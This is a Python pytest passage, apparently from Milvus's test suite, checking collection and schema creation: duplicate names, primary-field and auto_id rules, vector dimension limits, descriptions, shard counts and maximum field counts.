def test_collection_dup_name_with_desc(self):
"""
target: test collection with dup name
method: 1. default schema with desc 2. dup name collection
expected: desc consistent
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(description=ct.collection_desc)
collection_w = self.init_collection_wrap(name=c_name, schema=schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
self.collection_wrap.init_collection(c_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
assert collection_w.description == self.collection_wrap.description
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_new_schema(self):
"""
target: test collection with dup name and new schema
method: 1.create collection with default schema
2. collection with dup name and new schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
fields = [cf.gen_int64_field(is_primary=True)]
schema = cf.gen_collection_schema(fields=fields)
error = {ct.err_code: 0, ct.err_msg: "The collection already exist, but the schema is not the same as the "
"schema passed in."}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_dup_name_new_primary(self):
"""
target: test collection with dup name and new primary_field schema
method: 1.collection with default schema
2. collection with same fields and new primary_field schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field_one = cf.gen_int64_field()
int_field_two = cf.gen_int64_field(name="int2")
fields = [int_field_one, int_field_two, cf.gen_float_vec_field()]
schema = cf.gen_collection_schema(fields, primary_field=int_field_one.name)
collection_w = self.init_collection_wrap(name=c_name, schema=schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema,
exp_primary: int_field_one.name})
new_schema = cf.gen_collection_schema(fields, primary_field=int_field_two.name)
error = {ct.err_code: 0, ct.err_msg: "The collection already exist, but the schema is not the same as the "
"schema passed in."}
self.collection_wrap.init_collection(c_name, schema=new_schema, check_task=CheckTasks.err_res,
check_items=error)
assert collection_w.primary_field.name == int_field_one.name
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_new_dim(self):
"""
target: test collection with dup name and new dim schema
method: 1. default schema 2. schema with new dim
expected: raise exception
"""
self._connect()
new_dim = 120
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
schema = cf.gen_default_collection_schema()
new_fields = cf.gen_float_vec_field(dim=new_dim)
schema.fields[-1] = new_fields
error = {ct.err_code: 0, ct.err_msg: "The collection already exist, but the schema is not the same as the "
"schema passed in."}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
dim = collection_w.schema.fields[-1].params['dim']
assert dim == ct.default_dim
@pytest.mark.tags(CaseLabel.L2)
def test_collection_dup_name_invalid_schema_type(self, get_none_removed_invalid_strings):
"""
target: test collection with dup name and invalid schema
method: 1. default schema 2. invalid schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
error = {ct.err_code: 0, ct.err_msg: "Schema type must be schema.CollectionSchema"}
schema = get_none_removed_invalid_strings
self.collection_wrap.init_collection(collection_w.name, schema=schema,
check_task=CheckTasks.err_res, check_items=error)
assert collection_w.name == c_name
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_same_schema(self):
"""
target: test collection with dup name and same schema
method: dup name and same schema
expected: two collection object is available
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.init_collection(name=c_name, schema=default_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
assert collection_w.name == self.collection_wrap.name
@pytest.mark.tags(CaseLabel.L2)
def test_collection_none_schema(self):
"""
target: test collection with none schema
method: create collection with none schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Should be passed into the schema"}
self.collection_wrap.init_collection(c_name, schema=None, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_invalid_type_schema(self, get_none_removed_invalid_strings):
"""
target: test collection with invalid schema
method: create collection with non-CollectionSchema type schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Schema type must be schema.CollectionSchema"}
self.collection_wrap.init_collection(c_name, schema=get_none_removed_invalid_strings,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_invalid_type_fields(self, get_invalid_type_fields):
"""
target: test collection with invalid fields type, non-list
method: create collection schema with non-list invalid fields
expected: exception
"""
self._connect()
fields = get_invalid_type_fields
error = {ct.err_code: 0, ct.err_msg: "The fields of schema must be type list"}
self.collection_schema_wrap.init_collection_schema(fields=fields,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_with_unknown_type(self):
"""
target: test collection with unknown type
method: create with DataType.UNKNOWN
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Field dtype must be of DataType"}
self.field_schema_wrap.init_field_schema(name="unknown", dtype=DataType.UNKNOWN,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="exception not Milvus Exception")
@pytest.mark.parametrize("name", [[], 1, (1,), {1: 1}, "12-s"])
def test_collection_invalid_type_field(self, name):
"""
target: test collection with invalid field name
method: invalid string name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field, _ = self.field_schema_wrap.init_field_schema(name=name, dtype=5, is_primary=True)
vec_field = cf.gen_float_vec_field()
schema = cf.gen_collection_schema(fields=[field, vec_field])
error = {ct.err_code: 1, ct.err_msg: "expected one of: bytes, unicode"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("name", ["12-s", "12 s", "(mn)", "中文", "%$#", "a".join("a" for i in range(256))])
def test_collection_invalid_field_name(self, name):
"""
target: test collection with invalid field name
method: invalid string name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field, _ = self.field_schema_wrap.init_field_schema(name=name, dtype=DataType.INT64, is_primary=True)
vec_field = cf.gen_float_vec_field()
schema = cf.gen_collection_schema(fields=[field, vec_field])
error = {ct.err_code: 1, ct.err_msg: "Invalid field name"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_none_field_name(self):
"""
target: test field schema with None name
method: None field name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field, _ = self.field_schema_wrap.init_field_schema(name=None, dtype=DataType.INT64, is_primary=True)
schema = cf.gen_collection_schema(fields=[field, cf.gen_float_vec_field()])
error = {ct.err_code: 1, ct.err_msg: "You should specify the name of field"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("dtype", [6, [[]], {}, (), "", "a"])
def test_collection_invalid_field_type(self, dtype):
"""
target: test collection with invalid field type
method: invalid DataType
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Field dtype must be of DataType"}
self.field_schema_wrap.init_field_schema(name="test", dtype=dtype, is_primary=True,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_field_dtype_float_value(self):
"""
target: test collection with float type
method: create field with float type
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field, _ = self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=5.0,
is_primary=True)
schema = cf.gen_collection_schema(fields=[field, cf.gen_float_vec_field()])
error = {ct.err_code: 0, ct.err_msg: "Field type must be of DataType!"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_empty_fields(self):
"""
target: test collection with empty fields
method: create collection with fields = []
expected: exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields=[], primary_field=ct.default_int64_field_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_field(self):
"""
target: test collection with dup field name
method: Two FieldSchema have same name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field_one = cf.gen_int64_field(is_primary=True)
field_two = cf.gen_int64_field()
schema = cf.gen_collection_schema(fields=[field_one, field_two, cf.gen_float_vec_field()])
error = {ct.err_code: 1, ct.err_msg: "duplicated field name"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
assert not self.utility_wrap.has_collection(c_name)[0]
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("field", [cf.gen_float_vec_field(), cf.gen_binary_vec_field()])
def test_collection_only_vector_field(self, field):
"""
target: test collection just with vec field
method: create with float-vec fields
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe"}
self.collection_schema_wrap.init_collection_schema([field], check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_multi_float_vectors(self):
"""
target: test collection with multi float vectors
method: create collection with two float-vec fields
expected: raise exception (not supported yet)
"""
# 1. connect
self._connect()
# 2. create collection with multiple vectors
c_name = cf.gen_unique_str(prefix)
fields = [cf.gen_int64_field(is_primary=True), cf.gen_float_field(),
cf.gen_float_vec_field(dim=default_dim), cf.gen_float_vec_field(name="tmp", dim=default_dim)]
schema = cf.gen_collection_schema(fields=fields)
err_msg = "multiple vector fields is not supported"
self.collection_wrap.init_collection(c_name, schema=schema,
check_task=CheckTasks.err_res,
check_items={"err_code": 1, "err_msg": err_msg})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip("https://github.com/milvus-io/milvus/issues/12680")
def test_collection_mix_vectors(self):
"""
target: test collection with mix vectors
method: create with float and binary vec
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
fields = [cf.gen_int64_field(is_primary=True), cf.gen_float_vec_field(), cf.gen_binary_vec_field()]
schema = cf.gen_collection_schema(fields=fields, auto_id=True)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
def test_collection_without_vectors(self):
"""
target: test collection without vectors
method: create collection only with int field
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_collection_schema([cf.gen_int64_field(is_primary=True)])
error = {ct.err_code: 0, ct.err_msg: "No vector field is found."}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_without_primary_field(self):
"""
target: test collection without primary field
method: no primary field specified in collection schema and fields
expected: raise exception
"""
self._connect()
int_fields, _ = self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64)
vec_fields, _ = self.field_schema_wrap.init_field_schema(name=ct.default_float_vec_field_name,
dtype=DataType.FLOAT_VECTOR, dim=ct.default_dim)
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema([int_fields, vec_fields],
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_is_primary_false(self):
"""
target: test collection with all is_primary false
method: set all fields if_primary false
expected: raise exception
"""
self._connect()
fields = [cf.gen_int64_field(is_primary=False), cf.gen_float_field(is_primary=False),
cf.gen_float_vec_field(is_primary=False)]
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("is_primary", ct.get_invalid_strs)
def test_collection_invalid_is_primary(self, is_primary):
"""
target: test collection with invalid primary
method: define field with is_primary=non-bool
expected: raise exception
"""
self._connect()
name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Param is_primary must be bool type"}
self.field_schema_wrap.init_field_schema(name=name, dtype=DataType.INT64, is_primary=is_primary,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("primary_field", ["12-s", "12 s", "(mn)", "中文", "%$#", "a".join("a" for i in range(256))])
def test_collection_invalid_primary_field(self, primary_field):
"""
target: test collection with invalid primary_field
method: specify invalid string primary_field in collection schema
expected: raise exception
"""
self._connect()
fields = [cf.gen_int64_field(), cf.gen_float_vec_field()]
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields=fields, primary_field=primary_field,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("primary_field", [[], 1, [1, "2", 3], (1,), {1: 1}, None])
def test_collection_non_string_primary_field(self, primary_field):
"""
target: test collection with non-string primary_field
method: primary_field type is not string
expected: raise exception
"""
self._connect()
fields = [cf.gen_int64_field(), cf.gen_float_vec_field()]
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields, primary_field=primary_field,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_not_existed_primary_field(self):
"""
target: test collection with not exist primary field
method: specify not existed field as primary_field
expected: raise exception
"""
self._connect()
fake_field = cf.gen_unique_str()
fields = [cf.gen_int64_field(), cf.gen_float_vec_field()]
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields, primary_field=fake_field,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_collection_primary_in_schema(self):
"""
target: test collection with primary field
method: specify primary field in CollectionSchema
expected: collection.primary_field
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(primary_field=ct.default_int64_field_name)
self.collection_wrap.init_collection(c_name, schema=schema)
assert self.collection_wrap.primary_field.name == ct.default_int64_field_name
@pytest.mark.tags(CaseLabel.L0)
def test_collection_primary_in_field(self):
"""
target: test collection with primary field
method: specify primary field in FieldSchema
expected: collection.primary_field
"""
self._connect()
fields = [cf.gen_int64_field(is_primary=True), cf.gen_float_field(), cf.gen_float_vec_field()]
schema, _ = self.collection_schema_wrap.init_collection_schema(fields)
self.collection_wrap.init_collection(cf.gen_unique_str(prefix), schema=schema)
assert self.collection_wrap.primary_field.name == ct.default_int64_field_name
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="exception not Milvus Exception")
def test_collection_unsupported_primary_field(self, get_unsupported_primary_field):
"""
target: test collection with unsupported primary field type
method: specify non-int64 as primary field
expected: raise exception
"""
self._connect()
field = get_unsupported_primary_field
vec_field = cf.gen_float_vec_field(name="vec")
error = {ct.err_code: 1, ct.err_msg: "Primary key type must be DataType.INT64."}
self.collection_schema_wrap.init_collection_schema(fields=[field, vec_field], primary_field=field.name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_multi_primary_fields(self):
"""
target: test collection with multi primary
method: collection with two primary fields
expected: raise exception
"""
self._connect()
int_field_one = cf.gen_int64_field(is_primary=True)
int_field_two = cf.gen_int64_field(name="int2", is_primary=True)
error = {ct.err_code: 0, ct.err_msg: "Primary key field can only be one."}
self.collection_schema_wrap.init_collection_schema(
fields=[int_field_one, int_field_two, cf.gen_float_vec_field()],
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_primary_inconsistent(self):
"""
target: test collection with different primary field setting
method: 1. set A field is_primary 2. set primary_field is B
expected: raise exception
"""
self._connect()
int_field_one = cf.gen_int64_field(is_primary=True)
int_field_two = cf.gen_int64_field(name="int2")
fields = [int_field_one, int_field_two, cf.gen_float_vec_field()]
error = {ct.err_code: 0, ct.err_msg: "Primary key field can only be one"}
self.collection_schema_wrap.init_collection_schema(fields, primary_field=int_field_two.name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_primary_consistent(self):
"""
target: test collection with both collection schema and field schema
method: 1. set A field is_primary 2.set primary_field is A
expected: verify primary field
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field_one = cf.gen_int64_field(is_primary=True)
schema = cf.gen_collection_schema(fields=[int_field_one, cf.gen_float_vec_field()],
primary_field=int_field_one.name)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("auto_id", [True, False])
def test_collection_auto_id_in_field_schema(self, auto_id):
"""
target: test collection with auto_id in field schema
method: specify auto_id True in field schema
expected: verify schema's auto_id
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field = cf.gen_int64_field(is_primary=True, auto_id=auto_id)
vec_field = cf.gen_float_vec_field(name='vec')
schema, _ = self.collection_schema_wrap.init_collection_schema([int_field, vec_field])
assert schema.auto_id == auto_id
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("auto_id", [True, False])
def test_collection_auto_id_in_collection_schema(self, auto_id):
"""
target: test collection with auto_id in collection schema
method: specify auto_id True in collection schema
expected: verify schema auto_id and collection schema
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field = cf.gen_int64_field(is_primary=True)
vec_field = cf.gen_float_vec_field(name='vec')
schema, _ = self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=auto_id)
assert schema.auto_id == auto_id
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L2)
def test_collection_auto_id_non_primary_field(self):
"""
target: test collection set auto_id in non-primary field
method: set auto_id=True in non-primary field
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "auto_id can only be specified on the primary key field"}
self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64, auto_id=True,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_auto_id_false_non_primary(self):
"""
target: test collection set auto_id in non-primary field
method: set auto_id=True in non-primary field
expected: verify schema auto_id is False
"""
self._connect()
int_field_one = cf.gen_int64_field(is_primary=True)
int_field_two = cf.gen_int64_field(name='int2', auto_id=False)
fields = [int_field_one, int_field_two, cf.gen_float_vec_field()]
schema, _ = self.collection_schema_wrap.init_collection_schema(fields)
assert not schema.auto_id
@pytest.mark.tags(CaseLabel.L2)
def test_collection_auto_id_inconsistent(self):
"""
target: test collection auto_id with both collection schema and field schema
method: 1.set primary field auto_id=True in field schema 2.set auto_id=False in collection schema
expected: raise exception
"""
self._connect()
int_field = cf.gen_int64_field(is_primary=True, auto_id=True)
vec_field = cf.gen_float_vec_field(name='vec')
error = {ct.err_code: 0, ct.err_msg: "The auto_id of the collection is inconsistent with "
"the auto_id of the primary key field"}
self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=False,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("auto_id", [True, False])
def test_collection_auto_id_consistent(self, auto_id):
"""
target: test collection auto_id with both collection schema and field schema
method: set auto_id=True/False both field and schema
expected: verify auto_id
"""
self._connect()
int_field = cf.gen_int64_field(is_primary=True, auto_id=auto_id)
vec_field = cf.gen_float_vec_field(name='vec')
schema, _ = self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=auto_id)
assert schema.auto_id == auto_id
@pytest.mark.tags(CaseLabel.L2)
def test_collection_auto_id_none_in_field(self):
"""
target: test collection with auto_id is None
method: set auto_id=None
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Param auto_id must be bool type"}
self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64,
is_primary=True,
auto_id=None, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("auto_id", ct.get_invalid_strs)
def test_collection_invalid_auto_id(self, auto_id):
"""
target: test collection with invalid auto_id
method: define field with auto_id=non-bool
expected: raise exception
"""
self._connect()
int_field = cf.gen_int64_field(is_primary=True)
vec_field = cf.gen_float_vec_field(name='vec')
error = {ct.err_code: 0, ct.err_msg: "Param auto_id must be bool type"}
self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=auto_id,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_multi_fields_auto_id(self):
"""
target: test collection auto_id with multi fields
method: specify auto_id=True for multi int64 fields
expected: todo raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "auto_id can only be specified on the primary key field"}
cf.gen_int64_field(is_primary=True, auto_id=True)
self.field_schema_wrap.init_field_schema(name="int", dtype=DataType.INT64, auto_id=True,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("dtype", [DataType.FLOAT_VECTOR, DataType.BINARY_VECTOR])
def test_collection_vector_without_dim(self, dtype):
"""
target: test collection without dimension
method: define vector field without dim
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
float_vec_field, _ = self.field_schema_wrap.init_field_schema(name="vec", dtype=dtype)
schema = cf.gen_collection_schema(fields=[cf.gen_int64_field(is_primary=True), float_vec_field])
error = {ct.err_code: 1, ct.err_msg: "dimension is not defined in field type params"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="exception not Milvus Exception")
def test_collection_vector_invalid_dim(self, get_invalid_dim):
"""
target: test collection with invalid dimension
method: define float-vec field with invalid dimension
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
float_vec_field = cf.gen_float_vec_field(dim=get_invalid_dim)
schema = cf.gen_collection_schema(fields=[cf.gen_int64_field(is_primary=True), float_vec_field])
error = {ct.err_code: 1, ct.err_msg: f'invalid dim: {get_invalid_dim}'}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("dim", [-1, 0, 32769])
def test_collection_vector_out_bounds_dim(self, dim):
"""
target: test collection with out of bounds dim
method: invalid dim -1 and 32759
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
float_vec_field = cf.gen_float_vec_field(dim=dim)
schema = cf.gen_collection_schema(fields=[cf.gen_int64_field(is_primary=True), float_vec_field])
error = {ct.err_code: 1, ct.err_msg: "invalid dimension: {}. should be in range 1 ~ 32768".format(dim)}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_non_vector_field_dim(self):
"""
target: test collection with dim for non-vector field
method: define int64 field with dim
expected: no exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field, _ = self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64,
dim=ct.default_dim)
float_vec_field = cf.gen_float_vec_field()
schema = cf.gen_collection_schema(fields=[int_field, float_vec_field],
primary_field=ct.default_int64_field_name)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L1)
def test_collection_desc(self):
"""
target: test collection with description
method: create with description
expected: assert default description
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(description=ct.collection_desc)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L2)
def test_collection_none_desc(self):
"""
target: test collection with none description
method: create with none description
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(description=None)
error = {ct.err_code: 1, ct.err_msg: "None has type NoneType, but expected one of: bytes, unicode"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_long_desc(self):
"""
target: test collection with long desc
method: create with long desc
expected:
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
desc = "a".join("a" for _ in range(256))
schema = cf.gen_default_collection_schema(description=desc)
self.collection_wrap.init_collection(c_name, schema=schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
def test_collection_binary(self):
"""
target: test collection with binary-vec
method: create collection with binary field
expected: assert binary field
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_binary_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_binary_schema})
assert c_name in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L0)
def test_collection_shards_num_with_default_value(self):
"""
target:test collection with shards_num
method:create collection with shards_num
expected: no exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_schema, shards_num=default_shards_num,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_shards_num: default_shards_num})
assert c_name in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("shards_num", [-256, 0, 10, 256])
def test_collection_shards_num_with_not_default_value(self, shards_num):
"""
target:test collection with shards_num
method:create collection with not default shards_num
expected: no exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_schema, shards_num=shards_num,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_shards_num: shards_num})
assert c_name in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L2)
def test_collection_shards_num_with_error_type(self):
"""
target:test collection with error type shards_num
method:create collection with error type shards_num
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error_type_shards_num = "2" # suppose to be int rather than str
error = {ct.err_code: -1, ct.err_msg: f"expected one of: int, long"}
self.collection_wrap.init_collection(c_name, schema=default_schema, shards_num=error_type_shards_num,
check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_create_collection_maximum_fields(self):
"""
target: test create collection with maximum fields
method: create collection with maximum field number
expected: no exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_fields = []
limit_num = ct.max_field_num - 2
for i in range(limit_num):
int_field_name = cf.gen_unique_str("field_name")
field = cf.gen_int64_field(name=int_field_name)
int_fields.append(field)
int_fields.append(cf.gen_float_vec_field())
int_fields.append(cf.gen_int64_field(is_primary=True))
schema = cf.gen_collection_schema(fields=int_fields)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L2)
def test_create_collection_over_maximum_fields(self):
"""
target: Test create collection with more than the maximum fields
method: create collection with more than the maximum field number
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_fields = []
limit_num = ct.max_field_num
for i in range(limit_num):
int_field_name = cf.gen_unique_str("field_name")
field = cf.gen_int64_field(name=int_field_name)
int_fields.append(field)
int_fields.append(cf.gen_float_vec_field())
int_fields.append(cf.gen_int64_field(is_primary=True))
schema = cf.gen_collection_schema(fields=int_fields)
error = {ct.err_code: 1, ct.err_msg: "maximum field's number should be limited to 256"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
class TestCollectionOperation(TestcaseBase):
"""
******************************************************************
The following cases are used to test collection interface operations
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
def test_collection_without_connection(self):
"""
target: test collection without connection
method: 1.create collection after connection removed
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.connection_wrap.remove_connection(ct.default_alias)
res_list, _ = self.connection_wrap.list_connections()
assert ct.default_alias not in res_list
error = {ct.err_code: 0, ct.err_msg: 'should create connect first'}
self.collection_wrap.init_collection(c_name, schema=default_schema,
check_task=CheckTasks.err_res, check_items=error)
assert self.collection_wrap.collection is None
@pytest.mark.tags(CaseLabel.L1)
def test_collection_multi_create_drop(self):
"""
target: test cycle creation and deletion of multiple collections
method: in a loop, collections are created and deleted sequentially
expected: no exception
"""
self._connect()
c_num = 20
for _ in range(c_num):
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.drop()
